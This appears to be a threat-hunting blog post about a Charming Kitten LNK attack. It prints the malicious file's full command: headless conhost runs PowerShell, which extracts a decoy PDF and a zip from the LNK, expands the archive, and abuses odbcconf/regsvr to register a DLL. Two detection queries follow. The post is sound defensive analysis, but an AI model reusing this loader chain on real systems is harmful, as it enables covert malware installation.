128. Hunting for Charming Kitten
Hello everyone!
I rarely see adversaries use malicious documents nowadays. But I see LNK files more and more often! Today we'll look at another example, which belongs to Charming Kitten (we track this activity cluster as Cypress Werewolf).
So, the malicious LNK file distributed by the threat actors contained the following command:
conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;
Yes, it's really juicy from detection and hunting perspective. For example, it abuses conhost.exe with --headless argument to run the script, it's a good candidate for hunting, but requires some tuning to remove related legitimate activity, of course:
event_type: "processcreatewin"
AND
proc_file_name: "conhost.exe"
AND
cmdline: "headless"
Another interesting detection opportunity is abusing odbcconf.exe to run regsvr32.exe in order to register malicious DLL:
event_type: "processcreatewin"
AND
proc_file_name: "odbcconf.exe"
AND
cmdline: "regsvr"
Which parts of the script seemed interesting to you?
See you tomorrow!
Comments
Post a Comment